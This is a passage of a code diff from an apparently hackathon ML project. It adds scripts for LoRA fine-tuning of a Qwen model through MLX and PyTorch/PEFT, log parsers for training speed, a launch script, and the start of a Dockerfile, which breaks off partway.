|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
"""Run MLX LoRA training as the default local Mac training path."""
|
| 2 |
+
|
| 3 |
+
from __future__ import annotations
|
| 4 |
+
|
| 5 |
+
import argparse
|
| 6 |
+
import json
|
| 7 |
+
import shlex
|
| 8 |
+
import subprocess
|
| 9 |
+
import sys
|
| 10 |
+
from pathlib import Path
|
| 11 |
+
|
| 12 |
+
|
| 13 |
+
ROOT = Path(__file__).resolve().parents[1]
|
| 14 |
+
if str(ROOT) not in sys.path:
|
| 15 |
+
sys.path.insert(0, str(ROOT))
|
| 16 |
+
|
| 17 |
+
|
| 18 |
+
def write_json(path: Path, payload: dict) -> None:
|
| 19 |
+
path.parent.mkdir(parents=True, exist_ok=True)
|
| 20 |
+
path.write_text(json.dumps(payload, indent=2, sort_keys=True) + "\n", encoding="utf-8")
|
| 21 |
+
|
| 22 |
+
|
| 23 |
+
def main() -> None:
|
| 24 |
+
parser = argparse.ArgumentParser()
|
| 25 |
+
parser.add_argument("--model", default="Qwen/Qwen3.5-4B")
|
| 26 |
+
parser.add_argument("--source-root", default="artifacts/lora_qwen3_4b/data")
|
| 27 |
+
parser.add_argument("--output-root", default="artifacts/mlx_qwen3_4b")
|
| 28 |
+
parser.add_argument("--iters", type=int, default=120)
|
| 29 |
+
parser.add_argument("--batch-size", type=int, default=1)
|
| 30 |
+
parser.add_argument("--grad-accumulation-steps", type=int, default=8)
|
| 31 |
+
parser.add_argument("--learning-rate", type=float, default=5e-5)
|
| 32 |
+
parser.add_argument("--num-layers", type=int, default=8)
|
| 33 |
+
parser.add_argument("--max-seq-length", type=int, default=1024)
|
| 34 |
+
parser.add_argument("--steps-per-report", type=int, default=1)
|
| 35 |
+
parser.add_argument("--save-every", type=int, default=20)
|
| 36 |
+
parser.add_argument("--seed", type=int, default=7)
|
| 37 |
+
parser.add_argument("--fresh-start", action="store_true")
|
| 38 |
+
parser.add_argument("--include-valid", action="store_true")
|
| 39 |
+
args = parser.parse_args()
|
| 40 |
+
|
| 41 |
+
output_root = (ROOT / args.output_root).resolve()
|
| 42 |
+
data_root = output_root / "data"
|
| 43 |
+
log_path = output_root / "logs" / "mlx_train.log"
|
| 44 |
+
manifest_path = output_root / "run_manifest.json"
|
| 45 |
+
adapter_root = output_root / "adapters"
|
| 46 |
+
adapter_file = adapter_root / "adapters.safetensors"
|
| 47 |
+
speed_path = output_root / "metrics" / "speed_mlx.json"
|
| 48 |
+
|
| 49 |
+
output_root.mkdir(parents=True, exist_ok=True)
|
| 50 |
+
if args.fresh_start:
|
| 51 |
+
for rel in [log_path, speed_path, output_root / "training_summary.json", adapter_file]:
|
| 52 |
+
if rel.exists():
|
| 53 |
+
rel.unlink()
|
| 54 |
+
|
| 55 |
+
prepare_cmd = [
|
| 56 |
+
sys.executable,
|
| 57 |
+
"scripts/prepare_mlx_data.py",
|
| 58 |
+
"--source-root",
|
| 59 |
+
args.source_root,
|
| 60 |
+
"--output-root",
|
| 61 |
+
str(data_root.relative_to(ROOT)),
|
| 62 |
+
"--model",
|
| 63 |
+
args.model,
|
| 64 |
+
"--max-seq-length",
|
| 65 |
+
str(args.max_seq_length),
|
| 66 |
+
"--force",
|
| 67 |
+
]
|
| 68 |
+
if args.include_valid:
|
| 69 |
+
prepare_cmd.append("--include-valid")
|
| 70 |
+
subprocess.run(prepare_cmd, cwd=ROOT, check=True)
|
| 71 |
+
|
| 72 |
+
cmd = [
|
| 73 |
+
sys.executable,
|
| 74 |
+
"-m",
|
| 75 |
+
"mlx_lm",
|
| 76 |
+
"lora",
|
| 77 |
+
"--model",
|
| 78 |
+
args.model,
|
| 79 |
+
"--train",
|
| 80 |
+
"--data",
|
| 81 |
+
str(data_root),
|
| 82 |
+
"--mask-prompt",
|
| 83 |
+
"--num-layers",
|
| 84 |
+
str(args.num_layers),
|
| 85 |
+
"--batch-size",
|
| 86 |
+
str(args.batch_size),
|
| 87 |
+
"--iters",
|
| 88 |
+
str(args.iters),
|
| 89 |
+
"--learning-rate",
|
| 90 |
+
str(args.learning_rate),
|
| 91 |
+
"--steps-per-report",
|
| 92 |
+
str(args.steps_per_report),
|
| 93 |
+
"--steps-per-eval",
|
| 94 |
+
"1000000",
|
| 95 |
+
"--save-every",
|
| 96 |
+
str(args.save_every),
|
| 97 |
+
"--grad-accumulation-steps",
|
| 98 |
+
str(args.grad_accumulation_steps),
|
| 99 |
+
"--grad-checkpoint",
|
| 100 |
+
"--adapter-path",
|
| 101 |
+
str(adapter_root),
|
| 102 |
+
"--max-seq-length",
|
| 103 |
+
str(args.max_seq_length),
|
| 104 |
+
"--seed",
|
| 105 |
+
str(args.seed),
|
| 106 |
+
]
|
| 107 |
+
if not args.fresh_start and adapter_file.exists():
|
| 108 |
+
cmd.extend(["--resume-adapter-file", str(adapter_file)])
|
| 109 |
+
|
| 110 |
+
write_json(
|
| 111 |
+
manifest_path,
|
| 112 |
+
{
|
| 113 |
+
"status": "starting_training",
|
| 114 |
+
"trainer": "mlx_lm_lora",
|
| 115 |
+
"model": args.model,
|
| 116 |
+
"data_root": str(data_root),
|
| 117 |
+
"output_root": str(output_root),
|
| 118 |
+
"command": cmd,
|
| 119 |
+
"fresh_start": args.fresh_start,
|
| 120 |
+
},
|
| 121 |
+
)
|
| 122 |
+
|
| 123 |
+
log_path.parent.mkdir(parents=True, exist_ok=True)
|
| 124 |
+
with log_path.open("a", encoding="utf-8") as handle:
|
| 125 |
+
handle.write("\n===== mlx_lm_lora =====\n")
|
| 126 |
+
handle.write("COMMAND: " + " ".join(shlex.quote(part) for part in cmd) + "\n")
|
| 127 |
+
handle.flush()
|
| 128 |
+
process = subprocess.run(cmd, cwd=ROOT, stdout=handle, stderr=subprocess.STDOUT, text=True)
|
| 129 |
+
|
| 130 |
+
subprocess.run([sys.executable, "scripts/save_mlx_speed.py", "--log-path", str(log_path), "--output-path", str(speed_path)], cwd=ROOT, check=False)
|
| 131 |
+
|
| 132 |
+
summary = {
|
| 133 |
+
"status": "finished" if process.returncode == 0 else "failed",
|
| 134 |
+
"trainer": "mlx_lm_lora",
|
| 135 |
+
"return_code": process.returncode,
|
| 136 |
+
"log_path": str(log_path),
|
| 137 |
+
"speed_path": str(speed_path),
|
| 138 |
+
"adapter_root": str(adapter_root),
|
| 139 |
+
}
|
| 140 |
+
write_json(output_root / "training_summary.json", summary)
|
| 141 |
+
write_json(manifest_path, summary)
|
| 142 |
+
if process.returncode != 0:
|
| 143 |
+
raise SystemExit(process.returncode)
|
| 144 |
+
|
| 145 |
+
|
| 146 |
+
if __name__ == "__main__":
|
| 147 |
+
main()
|
scripts/save_mlx_speed.py
ADDED
|
@@ -0,0 +1,48 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
"""Save a small speed summary from an MLX LoRA training log."""
|
| 2 |
+
|
| 3 |
+
from __future__ import annotations
|
| 4 |
+
|
| 5 |
+
import argparse
|
| 6 |
+
import json
|
| 7 |
+
import re
|
| 8 |
+
from pathlib import Path
|
| 9 |
+
|
| 10 |
+
|
| 11 |
+
ROOT = Path(__file__).resolve().parents[1]
|
| 12 |
+
REPORT_RE = re.compile(r"Iter\s+(\d+):\s+Train loss.*?It/sec\s+([0-9.]+)", re.IGNORECASE)
|
| 13 |
+
|
| 14 |
+
|
| 15 |
+
def main() -> None:
|
| 16 |
+
parser = argparse.ArgumentParser()
|
| 17 |
+
parser.add_argument("--log-path", default="artifacts/mlx_qwen3_4b/logs/mlx_lora_benchmark.log")
|
| 18 |
+
parser.add_argument("--output-path", default="artifacts/mlx_qwen3_4b/metrics/speed_mlx.json")
|
| 19 |
+
args = parser.parse_args()
|
| 20 |
+
|
| 21 |
+
log_path = (ROOT / args.log_path).resolve()
|
| 22 |
+
output_path = (ROOT / args.output_path).resolve()
|
| 23 |
+
text = log_path.read_text(encoding="utf-8") if log_path.exists() else ""
|
| 24 |
+
|
| 25 |
+
records = []
|
| 26 |
+
for step, it_per_sec in REPORT_RE.findall(text):
|
| 27 |
+
itps = float(it_per_sec)
|
| 28 |
+
records.append(
|
| 29 |
+
{
|
| 30 |
+
"step": int(step),
|
| 31 |
+
"iterations_per_second": itps,
|
| 32 |
+
"seconds_per_step_estimate": 1.0 / itps if itps > 0 else None,
|
| 33 |
+
}
|
| 34 |
+
)
|
| 35 |
+
|
| 36 |
+
payload = {
|
| 37 |
+
"method": "mlx_lm_lora",
|
| 38 |
+
"source_log": str(log_path),
|
| 39 |
+
"records": records,
|
| 40 |
+
"latest_seconds_per_step": records[-1]["seconds_per_step_estimate"] if records else None,
|
| 41 |
+
}
|
| 42 |
+
output_path.parent.mkdir(parents=True, exist_ok=True)
|
| 43 |
+
output_path.write_text(json.dumps(payload, indent=2, sort_keys=True) + "\n", encoding="utf-8")
|
| 44 |
+
print(json.dumps(payload, indent=2, sort_keys=True))
|
| 45 |
+
|
| 46 |
+
|
| 47 |
+
if __name__ == "__main__":
|
| 48 |
+
main()
|
scripts/save_pytorch_baseline_speed.py
ADDED
|
@@ -0,0 +1,47 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
"""Save a small speed summary from the current PyTorch training log."""
|
| 2 |
+
|
| 3 |
+
from __future__ import annotations
|
| 4 |
+
|
| 5 |
+
import json
|
| 6 |
+
import re
|
| 7 |
+
from pathlib import Path
|
| 8 |
+
|
| 9 |
+
|
| 10 |
+
ROOT = Path(__file__).resolve().parents[1]
|
| 11 |
+
LOG_PATH = ROOT / "artifacts" / "lora_qwen3_4b" / "logs" / "train_lora_manual.log"
|
| 12 |
+
OUT_PATH = ROOT / "artifacts" / "lora_qwen3_4b" / "metrics" / "speed_baseline_pytorch.json"
|
| 13 |
+
|
| 14 |
+
|
| 15 |
+
STEP_RE = re.compile(r"(\d+)%\|.*?\|\s+(\d+)/(\d+)\s+\[(\d+):(\d+)<")
|
| 16 |
+
|
| 17 |
+
|
| 18 |
+
def main() -> None:
|
| 19 |
+
text = LOG_PATH.read_text(encoding="utf-8") if LOG_PATH.exists() else ""
|
| 20 |
+
matches = STEP_RE.findall(text)
|
| 21 |
+
records = []
|
| 22 |
+
for _pct, step, total, mins, secs in matches:
|
| 23 |
+
step_num = int(step)
|
| 24 |
+
elapsed_s = int(mins) * 60 + int(secs)
|
| 25 |
+
if step_num > 0:
|
| 26 |
+
records.append(
|
| 27 |
+
{
|
| 28 |
+
"step": step_num,
|
| 29 |
+
"total_steps": int(total),
|
| 30 |
+
"elapsed_seconds": elapsed_s,
|
| 31 |
+
"seconds_per_step_estimate": elapsed_s / step_num,
|
| 32 |
+
}
|
| 33 |
+
)
|
| 34 |
+
|
| 35 |
+
payload = {
|
| 36 |
+
"method": "pytorch_mps_lora",
|
| 37 |
+
"source_log": str(LOG_PATH),
|
| 38 |
+
"records": records,
|
| 39 |
+
"latest_seconds_per_step": records[-1]["seconds_per_step_estimate"] if records else None,
|
| 40 |
+
}
|
| 41 |
+
OUT_PATH.parent.mkdir(parents=True, exist_ok=True)
|
| 42 |
+
OUT_PATH.write_text(json.dumps(payload, indent=2, sort_keys=True) + "\n", encoding="utf-8")
|
| 43 |
+
print(json.dumps(payload, indent=2, sort_keys=True))
|
| 44 |
+
|
| 45 |
+
|
| 46 |
+
if __name__ == "__main__":
|
| 47 |
+
main()
|
scripts/start_mlx_training.sh
ADDED
|
@@ -0,0 +1,13 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
#!/bin/zsh
|
| 2 |
+
set -euo pipefail
|
| 3 |
+
|
| 4 |
+
ROOT="/Users/adithyavardhan/Tweeks/hack"
|
| 5 |
+
cd "$ROOT"
|
| 6 |
+
|
| 7 |
+
mkdir -p artifacts/mlx_qwen3_4b/logs
|
| 8 |
+
|
| 9 |
+
python scripts/run_mlx_training.py \
|
| 10 |
+
--model Qwen/Qwen3.5-4B \
|
| 11 |
+
--output-root artifacts/mlx_qwen3_4b \
|
| 12 |
+
--fresh-start \
|
| 13 |
+
"$@"
|
scripts/train_lora_sft.py
ADDED
|
@@ -0,0 +1,261 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
"""Run resumable LoRA SFT against the vulnops heuristic dataset."""
|
| 2 |
+
|
| 3 |
+
from __future__ import annotations
|
| 4 |
+
|
| 5 |
+
import argparse
|
| 6 |
+
import json
|
| 7 |
+
import math
|
| 8 |
+
import sys
|
| 9 |
+
from pathlib import Path
|
| 10 |
+
from typing import Dict, List
|
| 11 |
+
|
| 12 |
+
import torch
|
| 13 |
+
from torch.utils.data import Dataset
|
| 14 |
+
from transformers import (
|
| 15 |
+
AutoModelForCausalLM,
|
| 16 |
+
AutoTokenizer,
|
| 17 |
+
DataCollatorForSeq2Seq,
|
| 18 |
+
Trainer,
|
| 19 |
+
TrainerCallback,
|
| 20 |
+
TrainingArguments,
|
| 21 |
+
)
|
| 22 |
+
|
| 23 |
+
ROOT = Path(__file__).resolve().parents[1]
|
| 24 |
+
if str(ROOT) not in sys.path:
|
| 25 |
+
sys.path.insert(0, str(ROOT))
|
| 26 |
+
|
| 27 |
+
from training_utils import (
|
| 28 |
+
detect_device,
|
| 29 |
+
latest_checkpoint,
|
| 30 |
+
load_jsonl,
|
| 31 |
+
preferred_torch_dtype,
|
| 32 |
+
set_default_env,
|
| 33 |
+
write_json,
|
| 34 |
+
)
|
| 35 |
+
|
| 36 |
+
|
| 37 |
+
class JsonlSFTDataset(Dataset):
|
| 38 |
+
"""Mask prompt tokens so only the completion contributes to the loss."""
|
| 39 |
+
|
| 40 |
+
def __init__(self, records: List[Dict[str, object]], tokenizer, max_length: int):
|
| 41 |
+
self.examples: List[Dict[str, List[int]]] = []
|
| 42 |
+
for record in records:
|
| 43 |
+
prompt = str(record["prompt"])
|
| 44 |
+
completion = str(record["completion"])
|
| 45 |
+
prompt_ids = tokenizer(prompt, add_special_tokens=False)["input_ids"]
|
| 46 |
+
completion_ids = tokenizer(completion, add_special_tokens=False)["input_ids"] + [tokenizer.eos_token_id]
|
| 47 |
+
|
| 48 |
+
input_ids = (prompt_ids + completion_ids)[:max_length]
|
| 49 |
+
labels = ([-100] * len(prompt_ids) + completion_ids)[:max_length]
|
| 50 |
+
attention_mask = [1] * len(input_ids)
|
| 51 |
+
self.examples.append(
|
| 52 |
+
{
|
| 53 |
+
"input_ids": input_ids,
|
| 54 |
+
"labels": labels,
|
| 55 |
+
"attention_mask": attention_mask,
|
| 56 |
+
}
|
| 57 |
+
)
|
| 58 |
+
|
| 59 |
+
def __len__(self) -> int:
|
| 60 |
+
return len(self.examples)
|
| 61 |
+
|
| 62 |
+
def __getitem__(self, index: int) -> Dict[str, List[int]]:
|
| 63 |
+
return self.examples[index]
|
| 64 |
+
|
| 65 |
+
|
| 66 |
+
class JsonlMetricLogger(TrainerCallback):
|
| 67 |
+
"""Append metrics during training so partial runs are still inspectable."""
|
| 68 |
+
|
| 69 |
+
def __init__(self, output_root: Path):
|
| 70 |
+
self.output_root = output_root
|
| 71 |
+
self.metrics_path = output_root / "metrics" / "train_metrics.jsonl"
|
| 72 |
+
self.manifest_path = output_root / "run_manifest.json"
|
| 73 |
+
|
| 74 |
+
def on_log(self, args, state, control, logs=None, **kwargs):
|
| 75 |
+
if not logs:
|
| 76 |
+
return
|
| 77 |
+
payload = {
|
| 78 |
+
"global_step": int(state.global_step),
|
| 79 |
+
"epoch": float(state.epoch or 0.0),
|
| 80 |
+
**{key: float(value) if isinstance(value, (int, float)) else value for key, value in logs.items()},
|
| 81 |
+
}
|
| 82 |
+
self.metrics_path.parent.mkdir(parents=True, exist_ok=True)
|
| 83 |
+
with self.metrics_path.open("a", encoding="utf-8") as handle:
|
| 84 |
+
handle.write(json.dumps(payload, sort_keys=True) + "\n")
|
| 85 |
+
write_json(
|
| 86 |
+
self.manifest_path,
|
| 87 |
+
{
|
| 88 |
+
"status": "training",
|
| 89 |
+
"global_step": int(state.global_step),
|
| 90 |
+
"epoch": float(state.epoch or 0.0),
|
| 91 |
+
"best_model_checkpoint": state.best_model_checkpoint,
|
| 92 |
+
"log_history_entries": len(state.log_history),
|
| 93 |
+
},
|
| 94 |
+
)
|
| 95 |
+
|
| 96 |
+
|
| 97 |
+
class AbortOnInvalidLoss(TrainerCallback):
|
| 98 |
+
"""Stop training early when the run becomes numerically invalid."""
|
| 99 |
+
|
| 100 |
+
def on_log(self, args, state, control, logs=None, **kwargs):
|
| 101 |
+
if not logs:
|
| 102 |
+
return control
|
| 103 |
+
for key in ("loss", "eval_loss", "grad_norm"):
|
| 104 |
+
value = logs.get(key)
|
| 105 |
+
if isinstance(value, (int, float)) and not math.isfinite(float(value)):
|
| 106 |
+
control.should_training_stop = True
|
| 107 |
+
break
|
| 108 |
+
return control
|
| 109 |
+
|
| 110 |
+
|
| 111 |
+
def build_training_args(args, output_root: Path, use_cpu: bool) -> TrainingArguments:
|
| 112 |
+
warmup_steps = max(1, int(args.warmup_ratio * args.estimated_train_steps))
|
| 113 |
+
return TrainingArguments(
|
| 114 |
+
output_dir=str(output_root / "checkpoints"),
|
| 115 |
+
num_train_epochs=args.num_train_epochs,
|
| 116 |
+
per_device_train_batch_size=args.per_device_train_batch_size,
|
| 117 |
+
per_device_eval_batch_size=args.per_device_eval_batch_size,
|
| 118 |
+
gradient_accumulation_steps=args.gradient_accumulation_steps,
|
| 119 |
+
learning_rate=args.learning_rate,
|
| 120 |
+
warmup_steps=warmup_steps,
|
| 121 |
+
optim="adamw_torch",
|
| 122 |
+
weight_decay=args.weight_decay,
|
| 123 |
+
logging_strategy="steps",
|
| 124 |
+
logging_steps=args.logging_steps,
|
| 125 |
+
logging_first_step=True,
|
| 126 |
+
eval_strategy="no",
|
| 127 |
+
save_strategy="steps",
|
| 128 |
+
save_steps=args.save_steps,
|
| 129 |
+
save_total_limit=3,
|
| 130 |
+
report_to="none",
|
| 131 |
+
remove_unused_columns=False,
|
| 132 |
+
dataloader_num_workers=0,
|
| 133 |
+
dataloader_pin_memory=False,
|
| 134 |
+
gradient_checkpointing=True,
|
| 135 |
+
lr_scheduler_type="cosine",
|
| 136 |
+
load_best_model_at_end=False,
|
| 137 |
+
use_cpu=use_cpu,
|
| 138 |
+
fp16=False,
|
| 139 |
+
bf16=False,
|
| 140 |
+
max_grad_norm=0.5,
|
| 141 |
+
seed=args.seed,
|
| 142 |
+
)
|
| 143 |
+
|
| 144 |
+
|
| 145 |
+
def main() -> None:
|
| 146 |
+
parser = argparse.ArgumentParser()
|
| 147 |
+
parser.add_argument("--model", default="Qwen/Qwen3.5-4B")
|
| 148 |
+
parser.add_argument("--output-root", default="artifacts/lora_qwen3_4b")
|
| 149 |
+
parser.add_argument("--max-length", type=int, default=1536)
|
| 150 |
+
parser.add_argument("--num-train-epochs", type=float, default=6.0)
|
| 151 |
+
parser.add_argument("--per-device-train-batch-size", type=int, default=1)
|
| 152 |
+
parser.add_argument("--per-device-eval-batch-size", type=int, default=1)
|
| 153 |
+
parser.add_argument("--gradient-accumulation-steps", type=int, default=8)
|
| 154 |
+
parser.add_argument("--learning-rate", type=float, default=5e-5)
|
| 155 |
+
parser.add_argument("--warmup-ratio", type=float, default=0.1)
|
| 156 |
+
parser.add_argument("--weight-decay", type=float, default=0.0)
|
| 157 |
+
parser.add_argument("--logging-steps", type=int, default=5)
|
| 158 |
+
parser.add_argument("--save-steps", type=int, default=10)
|
| 159 |
+
parser.add_argument("--seed", type=int, default=7)
|
| 160 |
+
parser.add_argument("--fresh-start", action="store_true")
|
| 161 |
+
args = parser.parse_args()
|
| 162 |
+
|
| 163 |
+
try:
|
| 164 |
+
from peft import LoraConfig, TaskType, get_peft_model
|
| 165 |
+
except ImportError as exc:
|
| 166 |
+
raise RuntimeError("Install peft before running LoRA training.") from exc
|
| 167 |
+
|
| 168 |
+
output_root = (ROOT / args.output_root).resolve()
|
| 169 |
+
data_dir = output_root / "data"
|
| 170 |
+
train_records = load_jsonl(data_dir / "train.jsonl")
|
| 171 |
+
eval_records = load_jsonl(data_dir / "eval.jsonl")
|
| 172 |
+
if not train_records or not eval_records:
|
| 173 |
+
raise RuntimeError("Missing train/eval JSONL data. Run scripts/generate_sft_data.py first.")
|
| 174 |
+
|
| 175 |
+
set_default_env(output_root)
|
| 176 |
+
device = detect_device()
|
| 177 |
+
use_cpu = device == "cpu"
|
| 178 |
+
torch_dtype = torch.float32 if device == "mps" else preferred_torch_dtype(device)
|
| 179 |
+
|
| 180 |
+
tokenizer = AutoTokenizer.from_pretrained(args.model, trust_remote_code=True)
|
| 181 |
+
if tokenizer.pad_token is None:
|
| 182 |
+
tokenizer.pad_token = tokenizer.eos_token
|
| 183 |
+
|
| 184 |
+
model = AutoModelForCausalLM.from_pretrained(
|
| 185 |
+
args.model,
|
| 186 |
+
torch_dtype=torch_dtype,
|
| 187 |
+
trust_remote_code=True,
|
| 188 |
+
low_cpu_mem_usage=True,
|
| 189 |
+
)
|
| 190 |
+
model.config.use_cache = False
|
| 191 |
+
if hasattr(model, "enable_input_require_grads"):
|
| 192 |
+
model.enable_input_require_grads()
|
| 193 |
+
|
| 194 |
+
lora_config = LoraConfig(
|
| 195 |
+
task_type=TaskType.CAUSAL_LM,
|
| 196 |
+
r=16,
|
| 197 |
+
lora_alpha=32,
|
| 198 |
+
lora_dropout=0.05,
|
| 199 |
+
target_modules=["q_proj", "k_proj", "v_proj", "o_proj", "gate_proj", "up_proj", "down_proj"],
|
| 200 |
+
bias="none",
|
| 201 |
+
)
|
| 202 |
+
model = get_peft_model(model, lora_config)
|
| 203 |
+
|
| 204 |
+
if device in {"cuda", "mps"}:
|
| 205 |
+
model.to(device)
|
| 206 |
+
|
| 207 |
+
train_dataset = JsonlSFTDataset(train_records, tokenizer, args.max_length)
|
| 208 |
+
eval_dataset = JsonlSFTDataset(eval_records, tokenizer, args.max_length)
|
| 209 |
+
data_collator = DataCollatorForSeq2Seq(tokenizer=tokenizer, model=model, padding=True)
|
| 210 |
+
updates_per_epoch = max(
|
| 211 |
+
1,
|
| 212 |
+
math.ceil(len(train_dataset) / (args.per_device_train_batch_size * args.gradient_accumulation_steps)),
|
| 213 |
+
)
|
| 214 |
+
args.estimated_train_steps = max(1, math.ceil(args.num_train_epochs * updates_per_epoch))
|
| 215 |
+
training_args = build_training_args(args, output_root, use_cpu)
|
| 216 |
+
|
| 217 |
+
trainer = Trainer(
|
| 218 |
+
model=model,
|
| 219 |
+
args=training_args,
|
| 220 |
+
train_dataset=train_dataset,
|
| 221 |
+
eval_dataset=eval_dataset,
|
| 222 |
+
processing_class=tokenizer,
|
| 223 |
+
data_collator=data_collator,
|
| 224 |
+
callbacks=[JsonlMetricLogger(output_root), AbortOnInvalidLoss()],
|
| 225 |
+
)
|
| 226 |
+
|
| 227 |
+
checkpoint_dir = output_root / "checkpoints"
|
| 228 |
+
resume_checkpoint = None if args.fresh_start else latest_checkpoint(checkpoint_dir)
|
| 229 |
+
write_json(
|
| 230 |
+
output_root / "run_manifest.json",
|
| 231 |
+
{
|
| 232 |
+
"status": "starting_training",
|
| 233 |
+
"device": device,
|
| 234 |
+
"model": args.model,
|
| 235 |
+
"train_examples": len(train_dataset),
|
| 236 |
+
"eval_examples": len(eval_dataset),
|
| 237 |
+
"estimated_train_steps": args.estimated_train_steps,
|
| 238 |
+
"resume_checkpoint": str(resume_checkpoint) if resume_checkpoint else None,
|
| 239 |
+
},
|
| 240 |
+
)
|
| 241 |
+
|
| 242 |
+
train_result = trainer.train(resume_from_checkpoint=str(resume_checkpoint) if resume_checkpoint else None)
|
| 243 |
+
trainer.save_model(str(output_root / "adapter"))
|
| 244 |
+
tokenizer.save_pretrained(str(output_root / "adapter"))
|
| 245 |
+
|
| 246 |
+
final_eval = trainer.evaluate(eval_dataset=eval_dataset)
|
| 247 |
+
summary = {
|
| 248 |
+
"status": "finished",
|
| 249 |
+
"device": device,
|
| 250 |
+
"train_loss": float(train_result.training_loss),
|
| 251 |
+
"global_step": int(trainer.state.global_step),
|
| 252 |
+
"eval_loss": float(final_eval["eval_loss"]) if math.isfinite(float(final_eval["eval_loss"])) else None,
|
| 253 |
+
"adapter_dir": str(output_root / "adapter"),
|
| 254 |
+
}
|
| 255 |
+
write_json(output_root / "training_summary.json", summary)
|
| 256 |
+
write_json(output_root / "run_manifest.json", summary)
|
| 257 |
+
print(json.dumps(summary, indent=2, sort_keys=True))
|
| 258 |
+
|
| 259 |
+
|
| 260 |
+
if __name__ == "__main__":
|
| 261 |
+
main()
|
server/Dockerfile
ADDED
|
@@ -0,0 +1,32 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
FROM python:3.11-slim AS builder
|
| 2 |
+
|
| 3 |
+
ENV PYTHONDONTWRITEBYTECODE=1 \
|
| 4 |
+
PYTHONUNBUFFERED=1 \
|
| 5 |
+
PIP_NO_CACHE_DIR=1
|
| 6 |
+
|
| 7 |
+
WORKDIR /app/env
|
| 8 |
+
|
| 9 |
+
RUN python -m pip install --no-cache-dir uv
|
| 10 |
+
|
| 11 |
+
COPY . /app/env
|
| 12 |
+
|
| 13 |
+
RUN --mount=type=cache,target=/root/.cache/uv \
|
| 14 |
+
